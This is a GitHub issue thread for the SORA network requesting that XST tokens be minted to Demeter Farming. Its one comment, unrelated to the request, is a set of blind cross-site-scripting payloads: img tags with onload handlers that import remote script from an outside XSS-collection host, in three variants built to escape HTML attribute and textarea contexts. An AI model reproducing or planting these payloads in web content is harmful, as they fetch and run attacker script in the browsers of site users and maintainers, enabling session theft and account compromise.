### ISSUE TITLE
[Governance]: Mint XST to Demeter Farm

### ISSUE THREAD

**Issue by Tieumsan** [sora-xor/sora2-network#135]
### Problem statement

As part of the setup for the new XST Platform on SORA, we need to mint new tokens to enable the SORA community to use the token.

### Definition of Done

- [ ] XST tokens minted to Demeter Farming

**amount (x)**: 
**Demeter Farming address**:

**Comment by nonoateker123** [comment]
<Img Src="https://xss.report/c/l" Onload="import(this.getAttribute('src') + 0)">
"><Img Src="https://xss.report/c/l" Onload="import(this.getAttribute('src') + 0)">
"/></textarea><Img Src="https://xss.report/c/l" Onload="import(this.getAttribute('src') + 0)">
